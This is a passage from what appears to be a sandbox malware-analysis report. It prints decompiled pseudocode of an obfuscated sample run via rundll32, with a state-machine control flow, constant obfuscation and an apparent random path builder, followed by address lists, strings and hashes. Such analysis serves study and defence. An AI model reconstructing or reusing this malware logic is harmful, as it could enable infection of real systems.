				 *(_t950 + 0x10) =  *(_t950 + 0x140);
				while(1) {
					L1:
					_t896 =  *(_t950 + 0x14);
					while(1) {
						L2:
						while(1) {
							L3:
							_t954 = _t806 - 0x1dc05553;
							if(_t954 > 0) {
								goto L27;
							}
							L4:
							if(_t954 == 0) {
								_push( *((intOrPtr*)(_t950 + 0x120)));
								E002429E3(_t950 + 0x274, 0x400, E0025889D(0x25c6a0,  *(_t950 + 0x24), __eflags),  *(_t950 + 0x140),  *(_t950 + 0x44),  *(_t950 + 0x10c), _t950 + 0x17c, _t950 + 0x478,  *(_t950 + 0x80),  *(_t950 + 0x28));
								_t950 = _t950 + 0x24;
								E00252025( *(_t950 + 0x48), _t760,  *(_t950 + 0x3c),  *((intOrPtr*)(_t950 + 0x104)));
								_t751 =  *(_t950 + 0x18);
								_t806 = 0x23448a49;
								while(1) {
									L1:
									_t896 =  *(_t950 + 0x14);
									goto L2;
								}
							} else {
								_t955 = _t806 - 0x160634a6;
								if(_t955 > 0) {
									__eflags = _t806 - 0x16d97506;
									if(_t806 == 0x16d97506) {
										E0024F536( *(_t950 + 0x7c),  *(_t950 + 0x24),  *(_t950 + 0x70),  *((intOrPtr*)(_t950 + 0x144)));
										_t806 = 0x36d580c3;
										goto L13;
									} else {
										__eflags = _t806 - 0x1a0940a4;
										if(_t806 == 0x1a0940a4) {
											E0024839D(_t950 + 0x170, _t917);
											_t806 = 0x1dc05553;
											goto L13;
										} else {
											__eflags = _t806 - 0x1a22d724;
											if(_t806 != 0x1a22d724) {
												goto L44;
											} else {
												 *(_t950 + 0x138) =  *(_t950 + 0x138) & 0x00000000;
												 *(_t950 + 0x140) =  *(_t950 + 0x140) & 0x00000000;
												_t832 = _t950 + 0x13c;
												E0024C769(_t832, _t950 + 0x170,  *(_t950 + 0x88),  *(_t950 + 0x80), _t950 + 0x20c,  *(_t950 + 0x30), _t896, _t950 + 0x280, _t950 + 0x474,  *(_t950 + 0x3c),  *(_t950 + 0xf8),  *(_t950 + 0x90));
												_t950 = _t950 + 0x28;
												asm("sbb ecx, ecx");
												_t806 = (_t832 & 0xd5e50b3a) + 0x355eeb92;
												goto L13;
											}
										}
									}
								} else {
									if(_t955 == 0) {
										 *(_t950 + 0x160) = _t751;
										 *((intOrPtr*)(_t950 + 0x15c)) = 1;
										 *(_t950 + 0x160) = _t805;
										E002496CD(_t950 + 0x148,  *((intOrPtr*)(_t950 + 0xac)), _t950 + 0x158,  *(_t950 + 0x118));
										_pop(_t836);
										asm("sbb ecx, ecx");
										_t806 = (_t836 & 0x02a7bfa7) + 0x36d580c3;
										goto L13;
									} else {
										if(_t806 == 0x6ef04) {
											E0024F536( *(_t950 + 0x90),  *(_t950 + 0xc8),  *(_t950 + 0x84),  *(_t950 + 0x13c));
											_t806 = 0x16d97506;
											goto L13;
										} else {
											if(_t806 == 0x9a9cbcb) {
												_push(_t806);
												_push( *((intOrPtr*)(_t917 + 4)));
												_t941 = E002578B7(_t806);
												_t951 = _t950 + 4;
												_t805 = E00248736(_t780);
												__eflags = _t805;
												if(__eflags != 0) {
													_t751 = E00256B8A(_t941,  *((intOrPtr*)(_t951 + 0x58)), __eflags,  *((intOrPtr*)(_t951 + 0xfc)), _t805,  *_t917,  *((intOrPtr*)(_t951 + 0x30)),  *((intOrPtr*)(_t917 + 4)));
													_t950 = _t951 + 0x14;
													 *(_t950 + 0x10) = _t751;
													__eflags = _t751;
													if(__eflags == 0) {
														_push(_t805);
														_push( *(_t950 + 0xec));
														_t903 =  *(_t950 + 0xf8);
														_t817 =  *(_t950 + 0xbc);
														L48:
														E0024F536(_t817, _t903);
													} else {
														_t806 = 0x160634a6;
														while(1) {
															L1:
															_t896 =  *(_t950 + 0x14);
															goto L2;
														}
													}
												}
											} else {
												if(_t806 == 0xb43f6cc) {
													__eflags = E00259B45( *((intOrPtr*)(_t950 + 0xc74)),  *(_t950 + 0xd0),  *(_t950 + 0x9c), _t950 + 0x134);
													_t946 =  !=  ? 1 : _t946;
													_t806 = 0x2a19e3bf;
													 *(_t950 + 0x130) = _t946;
													L13:
													_t751 =  *(_t950 + 0x10);
													goto L14;
												} else {
													_t959 = _t806 - 0x13765d88;
													if(_t806 != 0x13765d88) {
														L44:
														__eflags = _t806 - 0x1a8884c7;
														if(__eflags != 0) {
															L14:
															_t896 =  *(_t950 + 0x14);
															continue;
														}
													} else {
														_push( *(_t950 + 0x108));
														_t787 = E0025889D(0x25c660,  *(_t950 + 0xa8), _t959);
														_t788 =  *0x25ca38; // 0x0
														_t790 =  *0x25ca38; // 0x0
														_t793 =  *0x25ca38; // 0x0
														E00257C6E(( *_t788)[2] & 0x000000ff, _t959,  *_t788, ( *_t788)[3] & 0x000000ff,  *(_t950 + 0x88),  *( *_t793) & 0x000000ff,  *(_t950 + 0xd0), ( *_t790)[1] & 0x000000ff,  *(_t950 + 0x110),  *(_t950 + 0x60),  *(_t950 + 0xdc),  *(_t950 + 0x118), _t950 + 0x1f0);
														_t950 = _t950 + 0x2c;
														E00252025( *(_t950 + 0xe4), _t787,  *(_t950 + 0x28),  *(_t950 + 0x3c));
														_t799 =  *0x25ca38; // 0x0
														_t806 = 0x261be6d7;
														_t896 = ( *_t799)[4] & 0x0000ffff;
														_t751 =  *(_t950 + 0x10);
														 *(_t950 + 0x14) = ( *_t799)[4] & 0x0000ffff;
														L2:
														L3:
														_t954 = _t806 - 0x1dc05553;
														if(_t954 > 0) {
															goto L27;
														}
													}
												}
											}
										}
									}
								}
							}
							L49:
							return _t946;
							L27:
							__eflags = _t806 - 0x23448a49;
							if(_t806 == 0x23448a49) {
								__eflags = E0025511B(_t950 + 0x140, _t950 + 0x174, _t950 + 0x14c);
								if(__eflags == 0) {
									_t806 = 0x6ef04;
									goto L44;
								} else {
									_t806 = 0x1a22d724;
									goto L13;
								}
							} else {
								__eflags = _t806 - 0x261be6d7;
								if(_t806 == 0x261be6d7) {
									_t918 = _t950 + 0x270;
									_t809 = 6;
									_t948 =  *(_t950 + 0x12c) % _t809 + 1;
									__eflags = _t948;
									while(__eflags != 0) {
										_t945 = ( *(_t950 + 0x130) & 0x0000000f) + 4;
										E0024D6C9( *(_t950 + 0x68), _t918, 1, _t945,  *(_t950 + 0xe8), _t950 + 0x130,  *((intOrPtr*)(_t950 + 0x58)));
										_t950 = _t950 + 0x18;
										_t919 = _t918 + _t945 * 2;
										_t803 = 0x2f;
										 *_t919 = _t803;
										_t918 = _t919 + 2;
										_t948 = _t948 - 1;
										__eflags = _t948;
									}
									_t946 =  *(_t950 + 0x130);
									 *_t918 = 0;
									_t806 = 0x1a0940a4;
									_t917 =  *((intOrPtr*)(_t950 + 0xc78));
									goto L1;
								} else {
									__eflags = _t806 - 0x2a19e3bf;
									if(_t806 == 0x2a19e3bf) {
										E0024F536( *((intOrPtr*)(_t950 + 0x58)),  *((intOrPtr*)(_t950 + 0xe0)),  *(_t950 + 0x4c),  *((intOrPtr*)(_t950 + 0x134)));
										_t806 = 0x355eeb92;
										goto L13;
									} else {
										__eflags = _t806 - 0x2ca20b85;
										if(_t806 == 0x2ca20b85) {
											 *(_t950 + 0x12c) = E00258C8F(_t806);
											_t806 = 0x9a9cbcb;
											goto L13;
										} else {
											__eflags = _t806 - 0x355eeb92;
											if(_t806 == 0x355eeb92) {
												E0024F536( *(_t950 + 0xd8),  *(_t950 + 0xd4),  *((intOrPtr*)(_t950 + 0x120)),  *((intOrPtr*)(_t950 + 0x14c)));
												_t806 = 0x6ef04;
												goto L13;
											} else {
												__eflags = _t806 - 0x36d580c3;
												if(_t806 == 0x36d580c3) {
													_push(_t805);
													_push( *(_t950 + 0xc0));
													_t903 =  *(_t950 + 0xcc);
													_t817 =  *(_t950 + 0x100);
													goto L48;
												} else {
													__eflags = _t806 - 0x397d406a;
													if(_t806 != 0x397d406a) {
														goto L44;
													} else {
														_t820 =  *(_t950 + 0x118);
														E0024F98C(_t950 + 0x14c, _t950 + 0x140,  *(_t950 + 0x94),  *((intOrPtr*)(_t950 + 0x128)),  *(_t950 + 0x84));
														_t950 = _t950 + 0x10;
														asm("sbb ecx, ecx");
														_t806 = (_t820 & 0xfc9ce882) + 0x16d97506;
														goto L13;
													}
												}
											}
										}
									}
								}
							}
							goto L49;
						}
					}
				}
			}

0x00249fe6
0x00249fed
0x00249ff6
0x00249ffe
0x0024a005
0x0024a006
0x0024a00d
0x0024a00e
0x0024a00f
0x0024a014
0x0024a01f
0x0024a022
0x0024a02d
0x0024a02f
0x0024a038
0x0024a043
0x0024a048
0x0024a053
0x0024a067
0x0024a06c
0x0024a075
0x0024a080
0x0024a092
0x0024a097
0x0024a0a0
0x0024a0ab
0x0024a0b6
0x0024a0be
0x0024a0c6
0x0024a0ce
0x0024a0d9
0x0024a0e4
0x0024a0ec
0x0024a0f7
0x0024a102
0x0024a10d
0x0024a118
0x0024a120
0x0024a129
0x0024a12e
0x0024a134
0x0024a13c
0x0024a147
0x0024a152
0x0024a15a
0x0024a165
0x0024a177
0x0024a17a
0x0024a181
0x0024a188
0x0024a193
0x0024a19b
0x0024a1a0
0x0024a1a8
0x0024a1b0
0x0024a1b8
0x0024a1c0
0x0024a1ca
0x0024a1ce
0x0024a1d4
0x0024a1dc
0x0024a1e7
0x0024a1ef
0x0024a1fa
0x0024a202
0x0024a206
0x0024a20a
0x0024a20f
0x0024a217
0x0024a222
0x0024a22a
0x0024a232
0x0024a23d
0x0024a248
0x0024a253
0x0024a25e
0x0024a269
0x0024a271
0x0024a27c
0x0024a287
0x0024a292
0x0024a29a
0x0024a2a5
0x0024a2b0
0x0024a2bb
0x0024a2c6
0x0024a2db
0x0024a2de
0x0024a2df
0x0024a2e6
0x0024a2f1
0x0024a2fc
0x0024a304
0x0024a30c
0x0024a317
0x0024a32a
0x0024a331
0x0024a33c
0x0024a352
0x0024a359
0x0024a364
0x0024a36f
0x0024a382
0x0024a389
0x0024a394
0x0024a39f
0x0024a3aa
0x0024a3b2
0x0024a3bd
0x0024a3c5
0x0024a3cd
0x0024a3d2
0x0024a3da
0x0024a3e5
0x0024a3f0
0x0024a3fb
0x0024a406
0x0024a411
0x0024a41c
0x0024a427
0x0024a42f
0x0024a434
0x0024a43c
0x0024a444
0x0024a44c
0x0024a460
0x0024a467
0x0024a472
0x0024a47d
0x0024a487
0x0024a492
0x0024a49d
0x0024a4a5
0x0024a4b0
0x0024a4be
0x0024a4c3
0x0024a4ce
0x0024a4d1
0x0024a4d5
0x0024a4da
0x0024a4e2
0x0024a4ea
0x0024a4f2
0x0024a4f7
0x0024a4ff
0x0024a507
0x0024a512
0x0024a51a
0x0024a525
0x0024a530
0x0024a538
0x0024a53d
0x0024a545
0x0024a54d
0x0024a558
0x0024a563
0x0024a56e
0x0024a57e
0x0024a582
0x0024a58a
0x0024a58e
0x0024a596
0x0024a59e
0x0024a5a6
0x0024a5ab
0x0024a5b3
0x0024a5bb
0x0024a5c6
0x0024a5d1
0x0024a5dc
0x0024a5e7
0x0024a5f2
0x0024a5fd
0x0024a609
0x0024a60c
0x0024a610
0x0024a618
0x0024a61d
0x0024a625
0x0024a638
0x0024a63f
0x0024a64a
0x0024a652
0x0024a657
0x0024a65c
0x0024a664
0x0024a66c
0x0024a679
0x0024a67d
0x0024a685
0x0024a68d
0x0024a695
0x0024a6a5
0x0024a6aa
0x0024a6b0
0x0024a6b5
0x0024a6bd
0x0024a6c5
0x0024a6ce
0x0024a6d3
0x0024a6dd
0x0024a6e2
0x0024a6e8
0x0024a6f0
0x0024a6fb
0x0024a706
0x0024a711
0x0024a719
0x0024a71e
0x0024a723
0x0024a72b
0x0024a733
0x0024a73b
0x0024a740
0x0024a748
0x0024a750
0x0024a758
0x0024a75d
0x0024a762
0x0024a76a
0x0024a776
0x0024a77b
0x0024a785
0x0024a78a
0x0024a790
0x0024a798
0x0024a7a0
0x0024a7ab
0x0024a7b6
0x0024a7c1
0x0024a7d3
0x0024a7d8
0x0024a7e9
0x0024a7ea
0x0024a7f1
0x0024a7fc
0x0024a807
0x0024a80f
0x0024a81a
0x0024a825
0x0024a830
0x0024a83b
0x0024a846
0x0024a854
0x0024a858
0x0024a860
0x0024a868
0x0024a872
0x0024a87d
0x0024a888
0x0024a893
0x0024a89b
0x0024a8a0
0x0024a8a5
0x0024a8ad
0x0024a8b5
0x0024a8c0
0x0024a8cb
0x0024a8d6
0x0024a8e1
0x0024a8ec
0x0024a8f7
0x0024a902
0x0024a90d
0x0024a918
0x0024a923
0x0024a92b
0x0024a936
0x0024a941
0x0024a955
0x0024a95a
0x0024a961
0x0024a96c
0x0024a977
0x0024a982
0x0024a989
0x0024a991
0x0024a99c
0x0024a9a4
0x0024a9ac
0x0024a9b1
0x0024a9b9
0x0024a9c9
0x0024a9cf
0x0024a9d7
0x0024a9df
0x0024a9e7
0x0024a9ef
0x0024a9f8
0x0024a9fd
0x0024aa03
0x0024aa0b
0x0024aa1e
0x0024aa1f
0x0024aa26
0x0024aa31
0x0024aa3c
0x0024aa44
0x0024aa4f
0x0024aa5a
0x0024aa65
0x0024aa79
0x0024aa80
0x0024aa92
0x0024aa99
0x0024aa9d
0x0024aa9d
0x0024aa9d
0x0024aaa1
0x0024aaa1
0x0024aaa4
0x0024aaa4
0x0024aaa4
0x0024aaaa
0x00000000
0x00000000
0x0024aab0
0x0024aab0
0x0024adbb
0x0024ae14
0x0024ae19
0x0024ae2d
0x0024ae32
0x0024ae38
0x0024aa9d
0x0024aa9d
0x0024aa9d
0x00000000
0x0024aa9d
0x0024aab6
0x0024aab6
0x0024aabc
0x0024ace5
0x0024aceb
0x0024adaa
0x0024adb1
0x00000000
0x0024acf1
0x0024acf1
0x0024acf7
0x0024ad88
0x0024ad8d
0x00000000
0x0024acfd
0x0024acfd
0x0024ad03
0x00000000
0x0024ad09
0x0024ad10
0x0024ad26
0x0024ad2e
0x0024ad64
0x0024ad69
0x0024ad6e
0x0024ad76
0x00000000
0x0024ad76
0x0024ad03
0x0024acf7
0x0024aac2
0x0024aac2
0x0024acac
0x0024acbb
0x0024acc2
0x0024acc9
0x0024acd1
0x0024acd2
0x0024acda
0x00000000
0x0024aac8
0x0024aace
0x0024ac86
0x0024ac8d
0x00000000
0x0024aad4
0x0024aada
0x0024ac01
0x0024ac02
0x0024ac0b
0x0024ac0d
0x0024ac29
0x0024ac2d
0x0024ac2f
0x0024ac4c
0x0024ac51
0x0024ac54
0x0024ac58
0x0024ac5a
0x0024b013
0x0024b014
0x0024b01b
0x0024b022
0x0024b041
0x0024b041
0x0024ac60
0x0024ac60
0x0024aa9d
0x0024aa9d
0x0024aa9d
0x00000000
0x0024aa9d
0x0024aa9d
0x0024ac5a
0x0024aae0
0x0024aae6
0x0024abcb
0x0024abcf
0x0024abd2
0x0024abd7
0x0024abde
0x0024abde
0x00000000
0x0024aaec
0x0024aaec
0x0024aaf2
0x0024b006
0x0024b006
0x0024b00c
0x0024abe2
0x0024abe2
0x00000000
0x0024abe2
0x0024aaf8
0x0024aaf8
0x0024ab0b
0x0024ab12
0x0024ab3b
0x0024ab4e
0x0024ab6c
0x0024ab71
0x0024ab85
0x0024ab8a
0x0024ab91
0x0024ab98
0x0024ab9c
0x0024aba0
0x0024aaa1
0x0024aaa4
0x0024aaa4
0x0024aaaa
0x00000000
0x00000000
0x0024aaaa
0x0024aaf2
0x0024aae6
0x0024aada
0x0024aace
0x0024aac2
0x0024aabc
0x0024b04a
0x0024b054
0x0024ae42
0x0024ae42
0x0024ae48
0x0024afef
0x0024aff1
0x0024b001
0x00000000
0x0024aff3
0x0024aff3
0x00000000
0x0024aff3
0x0024ae4e
0x0024ae4e
0x0024ae54
0x0024af59
0x0024af64
0x0024af69
0x0024af69
0x0024af6a
0x0024af94
0x0024af9b
0x0024afa0
0x0024afa3
0x0024afa8
0x0024afa9
0x0024afac
0x0024afaf
0x0024afaf
0x0024afaf
0x0024afb2
0x0024afbb
0x0024afbe
0x0024afc7
0x00000000
0x0024ae5a
0x0024ae5a
0x0024ae60
0x0024af41
0x0024af48
0x00000000
0x0024ae66
0x0024ae66
0x0024ae6c
0x0024af1a
0x0024af21
0x00000000
0x0024ae72
0x0024ae72
0x0024ae78
0x0024aef6
0x0024aefd
0x00000000
0x0024ae7a
0x0024ae7a
0x0024ae80
0x0024b02b
0x0024b02c
0x0024b033
0x0024b03a
0x00000000
0x0024ae86
0x0024ae86
0x0024ae8c
0x00000000
0x0024ae92
0x0024aeb5
0x0024aebd
0x0024aec2
0x0024aec7
0x0024aecf
0x00000000
0x0024aecf
0x0024ae8c
0x0024ae80
0x0024ae78
0x0024ae6c
0x0024ae60
0x0024ae54
0x00000000
0x0024ae48
0x0024aaa4
0x0024aaa1

Strings

dW, xrefs: 0024AA80
M#, xrefs: 0024A0EC
./, xrefs: 0024A492
nXj, xrefs: 0024A014
=;, xrefs: 0024A102
w, xrefs: 0024A44C
"m, xrefs: 0024A860
p=4E, xrefs: 0024A8E1
25, xrefs: 0024A33C
m9, xrefs: 0024A61D
jg, xrefs: 0024A165
q, xrefs: 0024A4DA
Q[, xrefs: 0024A188
j@}9, xrefs: 0024AE86
}=, xrefs: 0024A762
{, xrefs: 0024A893
NS5, xrefs: 0024A750
<8, xrefs: 0024A134
#}, xrefs: 0024A507
Lf, xrefs: 0024A625
Q, xrefs: 0024A7C1
tu, xrefs: 0024A706
KZ, xrefs: 0024A5DC
E, xrefs: 0024A991
m, xrefs: 0024A10D
C/, xrefs: 0024A76A
5a, xrefs: 0024A5FD
cA, xrefs: 0024A15A
S', xrefs: 0024A72B
Z9, xrefs: 0024A427
%, xrefs: 0024A3BD

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "m$#}$%$./$25$5a$<8$=;$C/$KZ$Lf$M#$Q[$Q$S'$Z9$cA$dW$j@}9$jg$m$m9$nXj$p=4E$tu${$}=$E$NS5$q$w
API String ID: 0-3061497230
Opcode ID: 21ffd29eeabb18fc047893fcb34a9ab187bee1d2beec20273b5afc659396c1e1
Instruction ID: 0f73764c57521eaefc4f01b1a0b397bbaf5c089fa1ec69c030f7384c68fe917c
Opcode Fuzzy Hash: 21ffd29eeabb18fc047893fcb34a9ab187bee1d2beec20273b5afc659396c1e1
Instruction Fuzzy Hash: E982247151C3818BE378CF25C589B9BBBE1FBC4318F10891DE19A862A0DBB59959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0024C769, Relevance: 24.4, Strings: 19, Instructions: 630
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0024C769(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				char _v4;
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				unsigned int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				intOrPtr _v316;
				char _v320;
				intOrPtr _t666;
				intOrPtr _t667;
				intOrPtr _t672;
				void* _t679;
				intOrPtr _t680;
				intOrPtr _t687;
				intOrPtr _t689;
				intOrPtr _t693;
				intOrPtr* _t694;
				signed int _t706;
				intOrPtr _t707;
				void* _t712;
				intOrPtr _t718;
				void* _t758;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				intOrPtr _t785;
				signed int _t786;
				intOrPtr _t788;
				char _t793;
				void* _t795;
				void* _t797;

				_t694 = __edx;
				_push(_a40);
				_push(_a36);
				_v20 = __ecx;
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20 & 0x0000ffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_a20 & 0x0000ffff);
				_v12 = 0x78501c;
				_v24 = 0;
				_v8 = 0;
				_t793 = 0;
				_v4 = 0;
				_t795 =  &_v320 + 0x30;
				_v232 = 0x7906;
				_t786 = 0xcd25e5e;
				_v232 = _v232 << 6;
				_v232 = _v232 >> 0xa;
				_v232 = _v232 ^ 0x00000790;
				_v156 = 0xf83b;
				_v156 = _v156 >> 0xb;
				_v156 = _v156 ^ 0x0000000c;
				_v52 = 0x2ceb;
				_v52 = _v52 | 0xa5610ac4;
				_v52 = _v52 ^ 0xa5612e27;
				_v208 = 0x96db;
				_v208 = _v208 + 0xffffce2c;
				_v208 = _v208 | 0x71346f29;
				_v208 = _v208 ^ 0x7134ef2f;
				_v116 = 0x28a4;
				_v116 = _v116 + 0xffff342e;
				_v116 = _v116 ^ 0xffff1cd2;
				_v124 = 0xa3bc;
				_v124 = _v124 + 0xffffb3e2;
				_v124 = _v124 ^ 0x0040579e;
				_v132 = 0x4a92;
				_v132 = _v132 << 0xb;
				_v132 = _v132 ^ 0x02509000;
				_v140 = 0xcc93;
				_v140 = _v140 >> 0xd;
				_v140 = _v140 ^ 0x04000006;
				_v148 = 0xadf6;
				_v148 = _v148 >> 5;
				_v148 = _v148 ^ 0x0008056f;
				_v216 = 0xcf16;
				_v216 = _v216 ^ 0x2caffd24;
				_v216 = _v216 >> 8;
				_v216 = _v216 ^ 0x002cad32;
				_v296 = 0xe55e;
				_v296 = _v296 << 0x10;
				_v296 = _v296 + 0xffff79ea;
				_v296 = _v296 << 5;
				_v296 = _v296 ^ 0xabaf3c40;
				_v152 = 0xf9a;
				_v16 = 0;
				_v320 = 0;
				_v152 = _v152 * 0x3f;
				_v152 = _v152 ^ 0x8003d6e6;
				_v120 = 0x15;
				_v120 = _v120 << 2;
				_v120 = _v120 ^ 0x00000054;
				_v144 = 0x2eae;
				_v144 = _v144 + 0x3c19;
				_v144 = _v144 ^ 0x00006ac4;
				_v56 = 0xab01;
				_t773 = 0x5e;
				_v56 = _v56 / _t773;
				_v56 = _v56 ^ 0x00004cb8;
				_v104 = 0x2a8e;
				_t774 = 0x2c;
				_v104 = _v104 / _t774;
				_v104 = _v104 ^ 0x000033ed;
				_v292 = 0xd22b;
				_v292 = _v292 | 0xd3babaa8;
				_t775 = 0x50;
				_v292 = _v292 * 0x6c;
				_v292 = _v292 >> 7;
				_v292 = _v292 ^ 0x00a58d92;
				_v96 = 0x39fa;
				_v96 = _v96 / _t775;
				_v96 = _v96 ^ 0x00002d01;
				_v240 = 0xf5d4;
				_v240 = _v240 ^ 0x5b9fa071;
				_v240 = _v240 >> 3;
				_v240 = _v240 ^ 0x0b73efef;
				_v248 = 0x1311;
				_t776 = 0x42;
				_v248 = _v248 / _t776;
				_v248 = _v248 + 0x5e6d;
				_v248 = _v248 ^ 0x00004acc;
				_v88 = 0x907;
				_t777 = 0x6e;
				_v88 = _v88 * 0x48;
				_v88 = _v88 ^ 0x0002ff0c;
				_v36 = 0x8ec2;
				_v36 = _v36 / _t777;
				_v36 = _v36 ^ 0x00005772;
				_v260 = 0x4792;
				_v260 = _v260 << 0xd;
				_v260 = _v260 >> 0xb;
				_v260 = _v260 >> 4;
				_v260 = _v260 ^ 0x00006a86;
				_v224 = 0x4f89;
				_v224 = _v224 + 0xffff3059;
				_t778 = 0x21;
				_v224 = _v224 * 0x6e;
				_v224 = _v224 ^ 0xffc8e4d3;
				_v48 = 0x8858;
				_v48 = _v48 + 0x804a;
				_v48 = _v48 ^ 0x00017e21;
				_v312 = 0xd58c;
				_v312 = _v312 | 0x45747a0f;
				_v312 = _v312 >> 0xa;
				_v312 = _v312 / _t778;
				_v312 = _v312 ^ 0x00008646;
				_v300 = 0xadcd;
				_v300 = _v300 >> 8;
				_v300 = _v300 << 9;
				_v300 = _v300 >> 1;
				_v300 = _v300 ^ 0x00008fc4;
				_v268 = 0xd742;
				_t779 = 0x30;
				_v268 = _v268 / _t779;
				_v268 = _v268 + 0x61d9;
				_v268 = _v268 >> 4;
				_v268 = _v268 ^ 0x00000191;
				_v204 = 0x8d76;
				_v204 = _v204 | 0x1111a955;
				_v204 = _v204 << 5;
				_v204 = _v204 ^ 0x2235a282;
				_v64 = 0x8939;
				_v64 = _v64 + 0xffff3fc4;
				_v64 = _v64 ^ 0xffff80c7;
				_v276 = 0x72;
				_v276 = _v276 * 0x7d;
				_v276 = _v276 + 0xffff8366;
				_v276 = _v276 >> 9;
				_v276 = _v276 ^ 0x007facee;
				_v44 = 0xf34a;
				_v44 = _v44 + 0xffffbf38;
				_v44 = _v44 ^ 0x00008263;
				_v112 = 0x1dc0;
				_v112 = _v112 ^ 0x2c6551d7;
				_v112 = _v112 ^ 0x2c653ad3;
				_v228 = 0xc596;
				_v228 = _v228 ^ 0x9ca21630;
				_v228 = _v228 ^ 0x8f0fd5bf;
				_v228 = _v228 ^ 0x13ad7fff;
				_v196 = 0x8cfa;
				_v196 = _v196 >> 1;
				_v196 = _v196 ^ 0xfb4b109c;
				_v196 = _v196 ^ 0xfb4b1bca;
				_v236 = 0x2fd6;
				_v236 = _v236 << 7;
				_v236 = _v236 << 2;
				_v236 = _v236 ^ 0x005fedce;
				_v180 = 0x51a5;
				_v180 = _v180 ^ 0x4af0041f;
				_v180 = _v180 + 0xfffff3cf;
				_v180 = _v180 ^ 0x4af05e30;
				_v244 = 0x8950;
				_v244 = _v244 << 0xc;
				_v244 = _v244 | 0xbaabdb8a;
				_v244 = _v244 ^ 0xbabf869d;
				_v40 = 0xc836;
				_v40 = _v40 + 0xffff3474;
				_v40 = _v40 ^ 0xffff8af1;
				_v176 = 0x9727;
				_v176 = _v176 + 0xffffb8fc;
				_v176 = _v176 >> 3;
				_v176 = _v176 ^ 0x00001e80;
				_v304 = 0x64c7;
				_v304 = _v304 + 0x56f7;
				_v304 = _v304 ^ 0x2de137fe;
				_v304 = _v304 + 0xaf99;
				_v304 = _v304 ^ 0x2de22ef8;
				_v308 = 0x2e06;
				_v308 = _v308 | 0x78777a1f;
				_v308 = _v308 * 0x79;
				_v308 = _v308 >> 3;
				_v308 = _v308 ^ 0x1e0f1828;
				_v92 = 0xc9a2;
				_v92 = _v92 | 0xf3c29ea2;
				_v92 = _v92 ^ 0xf3c28d84;
				_v100 = 0xecbf;
				_v100 = _v100 + 0xffff0faf;
				_v100 = _v100 ^ 0xffffc0a5;
				_v192 = 0x95e0;
				_v192 = _v192 << 8;
				_v192 = _v192 << 9;
				_v192 = _v192 ^ 0x2bc00f3b;
				_v200 = 0x7c40;
				_t780 = 0x3a;
				_v200 = _v200 / _t780;
				_v200 = _v200 << 8;
				_v200 = _v200 ^ 0x000244df;
				_v272 = 0x7605;
				_v272 = _v272 << 5;
				_v272 = _v272 + 0xffffdeaf;
				_v272 = _v272 >> 0xb;
				_v272 = _v272 ^ 0x00001482;
				_v108 = 0x1c78;
				_v108 = _v108 + 0x3c33;
				_v108 = _v108 ^ 0x00006c40;
				_v280 = 0xd61a;
				_v280 = _v280 ^ 0xfb8fe6a7;
				_v280 = _v280 + 0x5fc;
				_v280 = _v280 | 0xbad3e440;
				_v280 = _v280 ^ 0xfbdf8156;
				_v288 = 0x89a2;
				_v288 = _v288 + 0xffff4641;
				_v288 = _v288 >> 0xc;
				_v288 = _v288 >> 0xd;
				_v288 = _v288 ^ 0x000071e8;
				_v252 = 0xe21c;
				_v252 = _v252 ^ 0x457ecc8f;
				_t781 = 0x67;
				_v252 = _v252 * 0x59;
				_v252 = _v252 ^ 0x28de7ded;
				_v84 = 0xe1;
				_v84 = _v84 >> 3;
				_v84 = _v84 ^ 0x00001e3a;
				_v184 = 0xbeeb;
				_v184 = _v184 * 0x12;
				_v184 = _v184 + 0x8ae1;
				_v184 = _v184 ^ 0x000de1ad;
				_v68 = 0xfd10;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x000036f7;
				_v76 = 0x1f03;
				_v76 = _v76 * 0x49;
				_v76 = _v76 ^ 0x000897f9;
				_v264 = 0xf0d9;
				_v264 = _v264 * 0x66;
				_v264 = _v264 + 0xffffb5cf;
				_v264 = _v264 + 0xea22;
				_v264 = _v264 ^ 0x0060dcb6;
				_v168 = 0xdfa9;
				_v168 = _v168 ^ 0x7c3d7298;
